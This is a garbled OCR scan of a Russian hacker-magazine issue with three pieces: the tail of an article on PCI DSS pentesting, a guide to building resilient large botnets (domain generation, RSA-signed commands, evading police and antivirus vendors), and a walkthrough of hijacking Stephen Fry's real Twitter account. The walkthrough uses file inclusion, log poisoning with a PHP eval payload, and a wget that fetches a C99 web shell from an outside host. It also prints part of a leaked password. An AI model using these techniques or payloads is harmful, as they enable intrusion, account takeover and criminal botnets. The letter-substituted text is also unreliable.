инклудинг-файлов и выполнение команд на серве- 
ре. Что касается сІіепБзісІеуязвимостей.то, кроме 
верифицирования возможности эксплуатации 
уязвимости, тутболее ничего нетребуется. Авотс 
зегл/ег-зіеіе необходимо немного повозиться, ибо 
все-таки пентест, хоть и по РСІ 055. Какя отмечал 
ранее, мы ищем РАІ\І, СагсИзоІсІег №те и СѴС2/ 
СѴѴ2 опционально. Вероятнее всего, подобные 
данные содержатся в СУБД, а потому в случае 
нахождения ЗОБ-инъекции стоит оценить имена 
таблиц, колонок; желательно сделать несколько 
тестовых выборок, чтобы подтвердить или опро- 
вергнуть присутствие подобных данных в базе в 
незашифрованном виде. Если столкнулся с ВІіпсІ 
ЗОБ-иъе кцией, то лучше натравить на ѴѴеЬ-сервер 
здітар (с ключом — битр-аЩ, который на текущий 
момент работаете МуЗОБ, Огасіе, РозІдгеЗСіБ и 
М іегозоіі ЗОБ 5егл/ег. Этих да н н ых будет достаточ но 
для демонстрации использования уязвимости. 
Дальнейший этап — это анализ защищеннос- 
ти СУБД. Опять же, есть отличный инструмент 
— АррБеІюсБѵе от«АррІіса1:іоп ЗесигБу Іпс.», 
но это дорогое удовольствие. Ксожалению, 
аналогичного сканера безопасности, который 
бы выдавал такой объем информации, какэто 
умеет АррБеІюсБѵе, и поддерживал столько же 
СУБД, в настоящее время не существует. И потому 
приходится брать на вооружение множество 
отдельных, несвязанных между собой продуктов, 
которые заточены под работу с определенными 
вендорами. Так, для ораклятины минимальный 
набор пентестера будет следующим: 

• Огасіе БаБаЪазе СІіепБ — окружение 
для работы с СУБД 

• Тоаб Тог Огасіе — клиент для работы 
с РБ/ ЗОБ 

• Огасіе АззеззтепБ КіБ — брут поль- 
зователей и ЗІБ'ов баз 

• различные сценарии на языке РБ/8<2Б 




6Ш САІЧѴА5 СХОЖ С ИНТЕРФЕЙ- 
СОМ МЕТАЗРЬОІТ 



(например, аудит конфигурации или 
возможность спуститься на уровень 
выполнения команд ОС) 

Заключительный этап тестирования на проник- 
новения по РСІ — это анализ защищенности 
беспроводных сетей, вернее, даже не анализ, а 
поискточек доступа, использующих уязвимые 
конфигурации, таких как Ореп АР, ѴѴЕР и ѴѴРА/ 
Р5К. С другой стороны, стандарт РСІ не запрещает 
проводить более глубокий анализ, втом числе с 
восстановлением ключей для подключения кбес- 
проводной сети. Потому имеетсмысл осуществить 
подобного рода работы. Основным же инстру- 
ментом на этом этапе, конечно, будет аігсгаск-пд. 
Дополнительно можно провести атаку, направ- 
ленную на беспроводных клиентов, известную 
как«СаИе Байе», с использованием все того же 
инструмента. При проведении обследования бес- 
проводных сетей можно смело руководствоваться 
данными с сайта ѴУігеІеззсІеіюпсе.огд . 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

По результатам тестирования проводится анализ 
всей собранной информации в контексте соот- 
ветствия техническим требованиям стандарта 
РСІ 055. Таким же образом данные, получен- 
ные при пентесте, можно интерпретировать в 
контексте любого другого высокоуровневого 
документа, содержащего технические кри- 
терии и рекомендации ксистемеуправления 
информационной безопасности. Относительно 
используемого шаблона для отчетных докумен- 
тов по РСІ, — можно использоватьтребования 
МазІюгСагсІ к отчету по АзѴ-сканированию. В 
них предусматривается разделение отчета на 
два документа — документ верхнего уровня для 
руководителя, в котором содержатся красивые 
графики и указан процент соответствия текущего 
состояния системы требованиям РСІ 055, и 
технический документ, содержащий протокол 
проведенного тестирования на проникновение, 
выявленные и эксплуатируемыеуязвимости, а 
также рекомендации по приведению информа- 
ционной системы в соответствие стребованиями 
МазіегСагсБ Засим могу попрощаться и пожелать 
удачи в исследованиях! т 
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Ш КЕ5Р0Ы5Е ТО ТНЕ С0ММАЫ05 РВОМ 
А МАЫСІОиБ ЫБЕВ, СОЫСиВВЕЫТ АТТАСКБ 
ТО ТАВ6ЕТШ6 5ІТЕ ВЕ6ІЫ 




- Іп-Гес-Моп Ас*іѵі*іе5 

- ОоЗ АНаскз 

- Зрагп Маііг 

- Зрцѵаге 

- ІІрдгагіег і+5 
■Гипс+ісіп^і1і+іег_. е*с 






X РОМАН «РВЕОЮЕІУША» ХОМЕНКО / НТТР://ТІІТАМС.СОМ, 5РІКТ40С СМ АІЬ.СОМ / 

ВЕЧНЫЙ 

БОТНЕТ 



ПРИНЦИПЫ ЗАЩИТЫ БОЛЬШИХ БОТ-СЕТЕЙ 



Большие ботнеты — закрытая тема, на которую не то что в паблике не 
разговаривают, а даже в сверх-секретном- при вате мало интересных 
обсуждений. И одна из причин — ограниченное количествотаких 
бот-сетей (ведь мы говорим о сотняхтысяч зараженных компов!). Но, 
несмотря на относительную закрытость этой информации, я тебе по- 
ведаю абсолютно все самое интересное. 



^ Два года назад моя «аналитическая» группа по- 
| лучила заказ на разработку идеальной архитек- 
^ туры большого ботнета. Месяцушел на изучение 
й существующих решений и продумывание своих 
вариантов. То, что получилось, было реализовано 
и сейчасотлично работает:). С заказчиком был 
договор, что 2 года мы не будем распространять 
эту информацию. Сейчас время вышло, иты 
будешь первый, кто, может быть, сумеет реализо- 
вать архитектуру для своего ботнета. 



В статье мы рассмотрим: 

• Условия существования больших 
ботнетов 

• Удержание контроля 

• Генерацию доменов 

• Масштабируемость 

• Возможность разделения 

• Подачу команд, их защиту 

• Возврат результатов 



ОХ, НЕПРОСТАЯ ЖИЗНЬ 
У БОЛЬШИХ БОТНЕТОВ... 

Еслиутебя ботнетна 1000 или 10.000 компов, 
то, разумеется, с ним много проблем. Но все они 
кажутся ничтожными по сравнению страблами, 
когда размер сети перевалил за цифру в 100.000. 
На тебя и твой ботнет откроют настоящую охоту 
антивирусные компании, правоохранительные 
органы и обычные гении, которым отнефигделать 
захочется посмотреть кишки твоего бота. Да и 
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Ш РЕ5Р0Ы5Е ТО ТНЕ СОММАЫОЗ РКОМ 
А МАЫСІСШ5 ІІ5ЕР, СОЫСІЖРЕМТ АТТАСК5 
ТО ТАР6ЕТШ6 5ІТЕ ВЕ6Ш 




БЕЗ ЧЕРЧЕНИЯ СЛОЖНО АРХИТЕКТУРУ РАЗРАБАТЫВАТЬ :) 
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УПРАВЛЕНИЕ БОТНЕТОМ ПО 
СХЕМЕ ЕДИНОГО СЕРВЕРА 




УПРАВЛЕНИЕ 
БОТНЕТОМ ПО 

СХЕМЕ Р2Р 




А ТАК ФЕДЕРА- 
ЛЫ БУДУТ ИС- 
КАТЬ ПАРОЛЬ В 
ТВОЕМ БОТЕ 



«коллеги» не оставят в покое, — всеми средства- 
ми буд^т пытаться угнать ботнет. Тебя, конечно, 
ждет слава, и может даже покажут по ТВ, но этот 
пиарспособен полностью убить весь бизнес, если 
архитектура ботнета окажется плохой. 

Это война, и в ней можно победить, лишь исполь- 
зовав последи недостижение в науке. Чтобы убить 
твой ботнет, «враги» будут анализировать его, 
смотреть, что и какой делает, да и еще дизассемб- 
лировать код. И никакие антиотладочные приемы, 
многократная полиморфная криптовка и прочее 
не помогутза крыть от них внутренности бота. 

С этой проблемой можно бороться, соблюдая 
первое правило ботнетов: «Нужно строить ботов, 
считая, что вся информация о них будет полно- 
стью открыта». 

Вторая проблема возникаете масштабом ботнета. 
Огромное количество ботов не выдержит ни один 
сервак, а поставить кластер с распределителя- 
ми нагрузки у тебя не получится, потому что это 
слишком сложно и долго. Да и даже если все будет 
готово, — придут федералы (я так буду называть 



Г ражд-эне! 

Хочу обратиться к разным слоям общества, 
читающим эту статью. 

К милиции: не стоить все воспринимать 
всерьез, это лишь картинки с моего боль- 
ного сознания и судить меня нельзя :). 
Ксоздателям небольших ботнетов: 
советую внедрить некоторые моменты в 
архитектуру ботнетов. Поможет в будущем. 
К профессорам и академикам: можно ли на 
этих идеях защитить докторскую диссер- 
тацию? Или защищаются только потеории 
коммунизма? :). 

I 



ФБР, ФСБ, СБУ и пр.) и быстренько все конфис- 
куют. С этого рождается второе правило: «Ботнет 
должен управляться с обычных серверов». 

Приступим к рассмотрению архитектуры, соот- 
ветствующей этим правилам. 

КОМАНДНЫЙ ЦЕНТР 

Способ общения с ботами — это «позвоноч- 
ник» ботнета. Раньше очень популярной была 
передача команд через ІРС, где боты заходили 
в заранее определенные комнаты и ждали, что 
кто-то передаст им команду. Ну, этот метод только 
археологи сейчас используют, и о множествах его 
проблем даже не хочется говорить. Сейчас чаще 
всего юзается схема р2р или ѵѵеЬ. 
р2р — достаточно интересная схема, которая 
имеет право на жизнь при больших ботнетах. В 
ней преимуществом служитто, что нагрузка по 
передаче команд лежит на самих ботах. Минусов в 
ней тоже хватает: 

• Сложность архитектуры 

• Нестабильность сети 

• «Палевность» открытия портов 

• Сложность контроля 

• Сложность отдачи результатов от 

ботов 

• И многое прочее . . . 

Управление ботнетом поѵѵеб'у — пока самый 
идеальный вариант. Кпримеру, возьмем Хейз. У 
него в конфиге прописываем основной домен, где 
админка и дополнительный домен (если первый 
сервак накроется]. Но если завтра ботов будет 
много, они легко положат сервак, а если сервак 
и выдержит, то послезавтра придут федералы и 
прикроют как основной, так и дополнительный 
домен, после чего уже восстановить управление 
не уда стоя. Эта схема абсолютно не подходит для 
больших ботнетов. 



ГЕНЕРАТОРДОМЕНОВ 

Как в известном фильме легким движением руки 
штаны превращаются в шорты, таки мы можем 
бесполезную схему превратить в идеальную. И клю- 
чевая идея — в динамической генерации доменов, 
через которые бот будет общаться. Генерировать 
домены будем, используя генератор псевдослучай- 
ныхчисел (ГПСЧ). Еспиты незнаком сним, посмотри 
врезку —там я все коротко описал. Для нас важна 
одна фишка: если на вход генератора дать число 
1234, генератор может вернуть: 6452, 12,761 ит.д. И 
сколько бы раз и на каком компьютере это ни повто- 
ряли, всегда последовательность будет одинакова. 
Исходя из этого, мы можем написать функцию, 
что будет использовать генератор псевдослу- 
чайных чисел, и если передать какое-то число на 
генератор, он сможет сгенерировать случайную 
бесконечную последовательностьдоменов. Нам 
лишь нужно для синхронизации всем ботам пере- 
дать одинаковое начальное число. Сучетом всех 
замечаний принцип работы будет следующим: 

• Генерируем псевдослучайный домен 

• Проверяем, есть ли на главной стра- 
нице домена какой-то определенный 
текст — маркер 

• Если маркера нет, — возвращаемся к 
первому пункту 

• Если маркер есть, то получаем ко- 
манду для исполнения 

Окончания же доменов не генерируется полно- 
стью случайно, а выбираются из массива, который 
может содержать как обычные окончания, так и 
окончания бесплатных хостингов. Чем списокбу- 
дет больше — тем лучше. Он может вы глядеть так: 

. СОШ 

. огд 
. Ьо . иа 
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гуПтіі 

НТТР://ѴѴѴШ 



■ 

> Ііпкз 

• Хорошее описание 
РЭА-протокола: 
ги.ѵѵікіресііа.огд/ѵѵікі/ 
Р5А . 

• Немного о генерато- 
рах псевдослучайных 
чисел: ги.ѵѵікіресііа. 
огд/ѵѵі кі/Генера - 

тор псевдослучай- 
ных чисел. 



• 0 ботнетах: 

ги.ѵѵікіресііа.огд/ѵѵікі/ 

Ботнет. 




> іпТо 

Р5А (буквенная 
аббревиатура от фа- 
милий РіѵезЕ ЭЬатіг 
и АсЛетап) — криптог- 
рафический алгоритм 
с открытым ключом. 
Р5А стал первым ал- 
горитмом такого типа, 
пригодным и для 
шифрования, и для 
цифровой подписи. 
Алгоритм использу- 
ется в большом числе 
криптографических 
приложений. 





> ѵѵагпіпд 

Вся информация пре- 
доставлена только 
для ознакомительных 
целей. 



БОТНЕТ МОЖЕТ БЫТЬ КРАСИВЕЕ, ЧЕМ 

ЭЙФЕЛЕВА БАШНЯ 



Где «.Ьо.иа» — обычный бесплатный хостинг. Если он попадет 
в последовательность, то нам даже не нужно будет покупать 
домен, а просто бесплатно себе зарегаем поддомен. Этого 
будет достаточно. Бот, после проверки маркера, должен запра- 
шиватьопределенныйтекстовый файлик, кпримеру, Іетр123. 
М, и оттуда брать команду для исполнения. Говоря о задаче 
управления, у настожеестьтакой же генератор, каку бота, и мы 
можем получить первый домен. Далее пробуем его зарегать 
(если не получилось, —забиваем на него]. Берем второй домен 
с последовательности; если получилось его зарегать, то встав- 
ляем маркер на главную страничку и создаем файликІетр123. 
М с командой. Если когда-нибудь потеряем доступ кдомену 
( и л и а буза п р идет, феде ра л ы отб е рут и т. п . ] , то ге н е р и руе м тре- 
тий домен и уже туда помещаем команду. То есть, втакой схеме 
перекрыть доступ к ботам невозможно. Ведь если нам закроют 
миллион доменов с последовательности, мы поместим команду 
на миллион первом, и боты все равно найдутэтот домен. 

МАСШТАБИРУЕМОСТЬ 

Поскольку для управления мы используем обычные серваки, 
то быстро столкнемся с проблемами нагрузки, и сервакстанет 
медленно, но верно загибаться. Поэтому был разработан сле- 
дующий вариант — разделение ботнета на подсети. Разделе- 
ние делается командами — бот стучит на сервер и читает оттуда 
приблизительнотакую команду: 

разделиться: 3001-3004 

Что буквально значит: выбрать случайным образом числоот 
значения 3001 до 3004 и использовать его для генерации пос- 
ледовательности доменов. Так мы разделяем ботнет на 4 части, 
и у каждой теперь будетсвоя последовательность доменов. 
Соответственно, они будут стучаться на разные серваки за 
командами. А нам остается л ишь зарегистрировать 4 новых до- 
мена (по одному для каждой последовательности] и поместить 



Псевдослучайные числаи 



Генератор псевдослучайных чисел (ГПСЧ, англ. 
Рзеисіогапсіопп питЬегдепегаІюг, РРІЧО] — алгоритм, 
генерирующий последовательность чисел, элементы 
которой почти независимы друг от друга и подчиняются 
заданному распределению (обычно равномерному]. 
Современная информатика широко использует псев- 
дослучайные числа в самых разных приложениях — от 
метода Монте-Карло и имитационного моделирования 
до криптографии. При этом от качества используемых 
ГПСЧ напрямую зависит качество получаемых резуль- 
татов. Это обстоятельство подчеркивает известный 
афоризм Роберта Р. Кавью из ОРІЧЕ (англ.]: «Генерация 
случайных чисел слишком важна, чтобы оставлять ее 
на волю случая». Каждый генератор — это известная 
функция. Если ей дать на вход одно число, то она вернет 
другое. Еще можно рассматривать генератортак: мы ему 
на входдаем любое число, а он возвращаетбесконечную 
последовательность чисел, что кажутся случайными. 



команды управления на них. 

Такмы сможем делить нашу систему на скольугодно много не- 
зависимыхучастков. И уже каждому участку задавать команду. 
Также мы можем дать ко манду слиться: 
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УВИДЕТЬ, КАК РАСПРОСТРА- 
НЕН БОТНЕТ, ЛУЧШЕ ВСЕГО НА 
КАРТЕ 




СХЕМА ШИФРОВАНИЯ С ПОМО- 
ЩЬЮ Р5А 




55Н! 

ООН 1 ? СІѴЕ АИАѴ уот РД55МВДП ТО 
АМѴШЕ то Міш ВЕ ІШЕМІМС! 

Аімгуз 5ЪН С$«сиг« 5Не11) саппесѣіпд 

Со Соприіег 5сіепсе ОерагіяепЕ іп&іеай оі 

ТеІгеТ ог гзН. Грг яюге ІпТопыИсіп: . ^ 

Ь«р : //«и», с* . иші. & 

ПРОСТО ДЕЛЬНЫЙ СОВЕТ 



разделиться: 3001 

Мы получили отличную масштабируемость, да 
ктомуже, как побочный продует можем давать 
разные команды разным участкам, что иногда 
полезно. 

ЗАЩИТА КОМАНД 

Недавно в Сети проскакивала новостьотом, что 
какие-то ученые получили доступ к ботнету на 
несколько дней и что-то там анализировали. Нам 
это вообще не нужно. А сейчас это делается очень 
просто, ведь федералы могут, проанализировав 
бота, узнать команды и домены, где боты ищут ко- 
манды, а дальше передать любую команду, напри- 
мер, «самоуничтожиться». Каквариантзащиты, 
можем шифровать АЕ5-ОМ, а потом переводить в 
ВА5Е64. С одной стороны, шифрование мощное, 
но если бота могутдизассемблировать и достать 
пароль, все наши старания пойдугпрахом. 

В качестве решения есть технология, которой аме- 
риканские власти в свое время очень боялись. Даже 
запретили прогу, на несколько строчек написанную 
на Регі'е.алюди, выражая протест, печатали на 
футболках код этой программы. Какты понял — это 
история Р5А. С помощью В5А можно как шифровать 
сообщения, так и подписывать информацию, то есть 
гарантироватьто, что именно мы подали команду. 
Этим и воспользуемся. Сгенерируем два ключа: 
паблики приват, и в каждый ботзапишем паблик- 
ключ. А приват-ключ будем хранитьу себя. Файл с 
команда ми теперь должен быть та ким: 

1 . случайная_последовательность 

2. СиДатс.сот 



3. 00:01 08.07.2009 

4. 23:59 09.07.2009 
5 . команда 1 

6 . команда . . . 

7 . хеш_сгенерированный_приватным_ 
клюнем 

В первой строчке — случайная последователь- 
ность, что необходима для защиты от расшиф- 
ровки приватного ключа. Во второй строчке 
размещается случайно сгенерированный домен, 
на котором находится команда — это защищает от 
несанкционированного нами копирования файла 
на другие участки ботнета (помним о масшта- 
бируемости). В третьей и четвертой строчке — 
время (промежуток, когда команда актуальна) и, 
собственно, список команд. Последняя строчка, 
сгенерированная приватным ключом, — подпись, 
которая гарантирует, что команда пришла именно 
отхозяина ботнета. Когда бот считывает команду, 
то своим публичным ключом может проверить — 
соответствует л и текст подписи, если да — все ОК, 
если нет — игнорировать команду. Этот способ 
позволяет полностью защитить ботнет от«вра- 
гов». Сейчас не существует способа расшифровки 
ВЭАпри ключе в 2048 бит. Полностью держать 
команды в открытом виде тоже не всегда инте- 
ресно. Хотя никто никак повлиять не может, но от 
любознательных можно защититься, за шифровав 
файл с помощью какого-то симметрического клю- 
ча, типа АЕ5. При разработке бота также следует 
реализовать команду по смене публичного ключа 
в боте. Это создаст способ передачи части ботнета 
в другие руки, например, при продаже. Мы можем 
попросить покупателя сгенерировать публичный 
ключ — и дать нам (а приватный ключ покупатель 
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давать не дол жен, что гарантирует, что мы не 
заберем ботнет назад). Дальше нужно отправить 
ботам, к примеру, такую команду: 

взять_новый_публичный_ключ : " пуб- 
личный ключ" 

ВОЗВРАТ РЕЗУЛЬТАТОВ 

Обычно ботнетам не нужно отсылать информа- 
цию обратно, но для некоторых это обязательное 
условие. Возникаетвопросо безопасной передаче. 
Раз бототдаетсписокпаролей, — не очень приятно, 
если федералы, захвати в доступ ксерверу, потом 
заблокируютакки, которые боты старательно соби- 
рали. Для решения проблемы возьмем любимый 
РЗА. Он позволяете помощью публичного ключа 
зашифровать сообщения. Расшифровать сможем 
лишьмы.снашимсекретным приватным ключом. 
Для записи информации на сервер я советую 
использовать Р05Т-метод. Заранее определяем 
имя скрипта, которое будет при ни мать да иные 
(к примеру, Ш1123.рЬр). А бот после получения 
команды отсылает шифрованные результаты на 
домен, откуда получена команда (файл ііііііі 23.рЬр 
лишьзаписываетфайл на диск). Далее мы егоза- 
бираем ксебе на комп.ужетам расшифровываем 
приватным ключом и, как водится, анализируем. 

АДМИНКА 

Вот мы стобою и рассмотрели архитектуру, кото- 
рая кажется идеальной. По крайней мере, я не 
вижу в ней уязвимых моментов. Хотя есть минус, 

— система сложновата вуправлении. Мною была 
разработана удобная админка на РуФоп'е, что 
автоматизирует рутинууправления. Ксожалению, 
описаниеуже выходитза рамки статьи, но если 
тебе все же интересно узнать о ее архитектуре — 
напиши мне на почту. 

ГРОМ МУ СОВЕСТЬ 

Как видишь, даже математика иногда (или всегда) 
бывает полезна, и то время, что ты потратил (или еще 
потратишь) на ее изучение, никогда не будетлиш- 
ним. Если появились вопросы, или были не очень 
п о н ятн ы е м еста в статье — об ра ща й ся . т 
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ІѵѵіНег 

ВЗЛОМ ТѴѴІТТЕВ-АККАУНТА СТИВЕНА ФРАЯ 

В лентах новостей зачастую можно прочесть о том, что в очередной 
раз на Твиттере взломан аккаунт какой-нибудь Бритни Спирс, Джо- 
на МакКейна и иже сними. Как правило, такие взломы не составляют 
большого труда и проводятся с помощью грубой силы — брутфорса 
(звезды любят ставить простейшие пароли). Но брутфорс — не наш 
метод. На примере британского комика, звезды фильмов «Автостопом 
по галактике» и «V — значит вендетта» Стивена Фрая я подробно рас- 
скажу о том, как быстро и легко поиметь микроблог известной 
личности. 



МИКРОБЛОГГИНГ 

Начнем стого, что официальный сайт 
актера располагается по адресу ЬКрѴ/ѵѵѵѵѵѵ. 
зіербепітѵ.сопп и представляет собой собра- 
ние постов из его блога и форума, скопище 
рекламных баннеров и некоторое количество 
промо-трейлеров, рекламирующих произве- 
дения Фрая. Также на сайте можно увидеть 
тв иты а кте ра — гіербепІтѵ.сот/сІиЬІтѵЛѵѵіиег . 
Атак какТвиттер предоставляетсвой АРІ лю- 
бому желающему, то закралось подозрение, 
что где-то в конфигах сайта хранится и пароль 
к микроблогу :). Собственно, нашей конечной 
целью будет полный контроль над К/ѵіІТег- 
аккаунтом актера Кѵуіиег.сот/зІюрЬепІтѵ ). на 
данный момент имеющем 644,489(1] фолло- 
веров. 

ПОИСК БАГОВ 

Первым делом осмотрим сайт на предмет 
паблик движков. Изтаковых присутствуют 
мой любимый блоговый движок ѴѴогсІРгезз и 
печально известный форум рбрВВ. Открыв 
исходник главной страницы блога ( зіербепітѵ. 
сот/Ыод ), можно наблюдать следующее: 



стеСа пате= " депегаСог " 

сопСепЦ= "ЭДогсІРгезз 2 . 5 . 1 " /> 

К сожалению, для 2.5.1 версии вордпресса у 
меня в тот момент не было под рукой необхо- 
димых эксплойтов, и пришлось отбросить этот 
вариант. 

Далее необходимо узнать версию форума 
рбрВВ. Сделать это можно многими спо- 
собами, но самый удобный — переход по 
ссылке с историей версий движка зіербепітѵ. 
сотЛогит/босз/СНАМСЕЮС.ЫппІ . Та к ка к 
последний сбапде был «Сбапдез зіпсе 2.0.20», 
смело можно делать вывод, что версия форума 
находится далеко за пределами по-настояще- 
му юзабельныхуязвимостей (если, конечно, не 
считать таковыми всяческиеХЗЗ и С5РР баги). 
Не испытывая большого желания использо- 
вать известные Х55 для этой версии рбрВВ, я 
отправился за советом к великому и могучему 
Гуглу стаким запросом: 

зіСе : зСерЬеп^гу . сот НіІеСуре : рЪр 
На этот нехитрый запрос поисковик выдал 



кучу ссылок на РНР-файлы, которые находи- 
лись на сайте актера. Меня сразу же заинте- 
ресовала ссылка зіерЬепігу.сот/зесбоп.рЬр? 
5есІіоп=с[иЫтѵ&5иЬзесІіоп=Іѵѵіиег . 

Здесь налицо два варианта: либо обращение 
к базе данных с соответствующими парамет- 
рами, либо инклуд файлов шаблонов. 

Решив сразу проверить второй вариант, я 
составил запрос: 

зСерЪепНгу . сот/зесСіоп . рІірЗзесСіоп 
=с1иЬНгу&зиЪзесЦіоп=/ 

/ еД с / раз з ж!% О О 

На что движок сайта радостно выдал содер- 
жимое /еіс/раззѵѵсі :). Уязвимость локального 
инклуда с работающим нулл-байтом была 
найдена! Дело оставалось за малым — найти, 
в какой файл запихнуть злонамеренный код. 

УСЛУЖЛИВЫЕ логи 

Если ты читал мою статью в прошлом номере т . 
то должен знать о замечательных способах 
инжекта своего кода через различные симво- 
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Ллгіг.,, 'М_Р1(кит_ТЭД*зГ . м_ТГ_Рт ІИи і тпщі 



Г т*вМ*'*» «яи 

а* Іи» і -ІІ.ШШІ «ТЯ- іГ ДО1БЕІ. - 

*| і Ми ■ -іг_№№Т^шоідогі_?п#ип- 
■ п. і -|р «гдаіт ?*« тТ»Я_ТІИК*Т(" 



■р^^^ч.4.«і/3і*ив*г, И»' 
■яигт.ртсіт/Тпіяіг в**' 



-ів.вь»ц:_іям г , те».е»і" интм 1 



К0НФИГ5ТЕРНЕЫРРѴ.С0М 



лические ссылки, находящиеся в /ргос/зеіі/*. 
Попробуем за юзать хранилище локальных 
переменных/ргос/зеІіУепѵігоп: 

зРерНепРгу . сот/зесРіоп . рИр?зесРіоп 
=с1иЪ:Егу&зиЪзесРіоп=/ 

/ргос/зе1:Е/епѵігоп%00 

К сожалению, /р го с/з е Іб/е п ѵ і го п оказался для 
нас недоступен :(. 

Теперь настал черед попробовать проин- 
клудитьлоги. Путем нехитрого подбора 
выяснилось, что апачевский еггог_1од на- 
ходится в /ргос/зеІ^ЛсІ/2 (будем юзать имен- 
но его, так как ассезз_1од для такого сайта 
наверняка будет размером в пару-тройку 
гигабайт, которые окажутся неподвластны- 
ми для І_РІ). 

Зачастую в еггог_1од записывается без 
всякой фильтрации переменная течете г, в 
которую как раз таки и можно проинжектить 
наш РНР-код. Осталось только вызвать ошиб- 
ку, которая и запишется в лог. Самой легко 
выполнимой является ошибка следующего 
формата: 

[8аР СГиІ 11 23:39:21 2009] [еггог] 
[сііепр х.х.х.х] сііепр зепР 
НТТР/1.1 гериезР тРЬоир РюзРпате 
(зее КРС2616 зесРіоп 14.23) : / 

Чтобы вызвать такую ошибку и записать наш 
еѵіі-код, достаточно лишь послать к нужному 
хосту хэдер с пустым заголовком НозР Сде- 
лать это можно, например, так: 



ШЕЛЛ НАьТЕРНЕЫРкѴ.СОМ 




2 : /изг/1оса1/Ьіп/сиг1 . ехе "ЬРРр : // 
ѴТѴ7Ѵ7 . зРерНепРгу . сот/ " -Н "НозР:" 
--геРегег "<?рНр еѵаі ( $_СЕТ [стсі] ) ; 
?>" 

В итоге, наш код успешно запишется в 
еггог_1од: 

[8аР СГиІ 11 23:39:21 2009] [еггог] 
[сііепр х.х.х.х] сііепр зепР 
НТТР/1.1 гериезР тРЬэиР РюзРпате 
(зее КРС2616 зесРіоп 14.23) : /, 
геРегег: <?рНр еѵаі ( $_СЕТ [стсі] ) ; ?> 
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С:\Лосшіеп*$ апгі $е**іпдз\М4д>г :/изі % /1оса1/Ъіп/сиг1.ехе , Ъ^^р://ими.8^ерЬепГх к у .с 

пт/ ,р — Н И 

<!БОСТѴРЕ НТМЬ РИВЫС "-//ІЕТР//РТР НТМЬ 2.0//ЕЫ"> 

<Ь*п1ХЬеас1> 

<*і*1е>400 Васі Кедие$*</* і* 1е> 

< /Ье асі >< Ьо сі у > 

<Ы>Вай Речиез*</М> 

<р>Ѵоиг Ьхчшзег зеп* а гедиез* *Ьа* *Ьіз зегѵег соиісі по* ипсіегз*апсІ.<Ьг /У 

</р> 

<>и*> 

<асЫге$з>АрасЬе/2 .2 .3 <ВеЪіап> РНР/5 .2 .0-8+е*сМЗ 8егѵег а* 10.10.20.211 Рог* 80 
</асЫгез$> 

</ЬогіуХ/Ь*п1> 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• ѵѵѵѵѵѵ.зІерЬепІтѵ. 
сот — виновник 
торжества. 

• ги.ѵѵікіресііа.огд/ 
ѵѵікі/Стивен Фрай 
— об актере на 
Википедии. 

• ІѵуіНег.сот/ 
зіербепіт — микроб- 
лог Стивена Фрая на 
Твиттере. 




> іпіо 

Стивен Джон Фрай 

(51:ерЬеп ^оЬ п 
Ргу] — английский 
писатель, актер 
и драматург, славу ко- 
торому принесли роли 
в комедийных теле- 
сериалах («Чёрная 
Гадюка», «Шоу Фрая 
иЛори»и«Дживси 
Вустер»]. За предела- 
ми Великобритании 
Фрай известен 
в основном по роли 
Оскара Уайльда 
в фильме «Уайльд» 
(1997). Помимо 
написания сцена- 
риев и текстов для 
телевидения, ра- 
дио, кино и театров, 
Фрай выступает 
автором статей 
и ведущим колонок 
в нескольких газе- 
тах и журналах. 



РЕЗУЛЬТАТ ОТСЫЛКИ ПУСТОГО ЗАГОЛОВКА Н05Т 




МОЕ ПОСЛАНИЕ НА ТВИТТЕРЕ ОТ ИМЕНИ ФРАЯ 



- и мы сможем выполнять любые команды по следующей 
ссылке: 

ТШДр : / /шш. зДерЬепГгу . сош/зесДіоп .рАрРзес 
Діоп=с1иЬГгу&зиЪзесДіоп=/ 

/ргос/зеІГ/ 

М/2%00&стсІ=р]іріп:Ео ( ) ; 

ПРОНИКНОВЕНИЕ 

При дальнейших раскопках и использовании команды бпб 
./ Луре б -регт 0777 -Із выяснилось, что на сервере при- 
сутствуют несколько директорий, доступных для записи. Я 
выбрал /Ьоте/ітѵ/риЫ-іс ЫтІ/іта/Ыоа ОіитЬз/ и залил 
туда С99 табЗНе II под именем Ыод.рбр с помощью ѵѵдеГ 

ТШДр: / /шт. зЦерЬепГгу . сот/зесЦіоп.р1ір?зес 
Діоп=с1иЬГгу&зиЪзесДіоп=/ 

/ргос/зеІГ/ 

Гс1/2%00&стс1=зузЦет ( 'ѵ^деР -О /Ьоше/Ггу/риЫіс_ 
ЬРт1/ітд/Ыод_Ц}іитЬз/Ыод.р]тр ГШДр: //тасіпеЦ . 
пате/Гі1ез/с!оѵт1оас1/9_с99тас1з]іе11 .ріір 1 ) ; 

Остается самое главное — найти доступы кобожаемому 
Фраем Твиттеру. А начнем мы поиске просмотра исходни- 
ка /ЬотеЛгѵ/риЫіс Ыті/іпбех.рбр : 

<?рЬр 

іпс!ис1е_опсе ( " 1іЬ/зТ_шаіп.р]гр" ) ; 



$агуВІодЕпДгу = ТпСеДНотерадеВІодАггау ( ) ; 
$агуВІодЗДаДз = ТпСеДВІодЗДаДзАггау ( ) ; 
$агуЕогитЗДаДз = ГпСеДЕогитЗДаДзАггау ( ) ; 
$зДгЗесДіоп = " " ; 

$зДгЗиЪЗесДіоп = " " ; 
іпсіисіе (ЗЕ_ВАЗЕ_БІК. " /ДетрІаДез/ 
паѵідаДіоп/ЪеасІег . рАр" ) ; 



Далее — ІіЬ/зіуппаіп.рЬр: 

<?рЬр 

іпс1ис!е_опсе " зД_сопзДапДз .рЬр" ; 
іпс1ис!е_опсе " зД_с!Ь_с1азз . рЬр" ; 
іпс1исіе_опсе " зД_Детр1аДе .рЬр " ; 
іпс1исіе_опсе " з Д_сас]ге_ДипсДіопз . рАр" ; 



И, наконец, ІіЬ/зіусопзіапІіБ.рЬр: 

<?р]гр 
// ТѴіДДег 

сІеДіпе ( * ЗЕ_ТШТТЕК_ІІЗЕК 1 , ' зДерЬепДгу ' ) ; 
СІеДіпе ( ' ЗЕ_ТЖТТЕК_РАЗЗЖЖВ ' , ' (І2дхЬСЕ4еМ9иМ2 
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5*ІерІк»П8 Т^і«егш»і 

ЭцтЕттѵ/ветз Р ѵс«_гв. кярілез то зтпрннм 



фпчгКІбОЭМтт ТиттдВжсотег, 

еЫ? 

аіч>Ш # Асчіт ауа 

I Лм Ьмп той готкі. тммгмііо 
Авйозіеа гпііііпд апо Шаопд, ѵчікйпд 
агх) «ЬаЮпд • • ѵѵаЬ г>спг, а К^ісН Ѵ'егс 
апО пом а Лппог 
аЬои! і Ьоип а$е 

